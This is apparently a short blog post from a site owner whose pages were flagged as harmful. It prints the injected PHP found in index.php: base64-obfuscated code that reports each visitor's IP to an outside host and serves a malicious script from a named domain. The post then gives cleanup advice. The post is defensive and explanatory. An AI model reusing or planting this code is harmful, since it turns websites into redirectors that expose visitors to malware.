This site contains code that may be harmful to users computers

So, your site may harm computers.
This site contains code that may be harmful to users’ computers. The site is currently being displayed with a warning tag in search results.


Check it with online site virus scanner to see a strange script being executed on you website pages, or, simply, a malware, redirecting your traffic to bogus locations to increase malicious sites pagerank.
http://feelthesame.changeip.name/rsize.js
It’s clear you won’t see anything in the page source, so go check your index.php. This is infected code inserted into the file:

function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

		if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
		$ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
		$content = @file_get_contents($get);
		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;

		}
}
collectnewss ();

It will be the same for Drupal, Joomla and other CMS since the malware uses a universal method to hijack sites. So, remove the extra code and request another site check. The question that remains is how the virus got to your site web pages? First idea is a security bug in the CMS. But the FTP log files had some strange connections from another country, and CMS is not related to FTP in any way. Giving that I use very complicated passwords and never store them, my guess is that the hosting provider got hijacked and leaked the passwords data. So, change all your site passwords, not only the FTP one, and update your CMS just in case.

Leave a Comment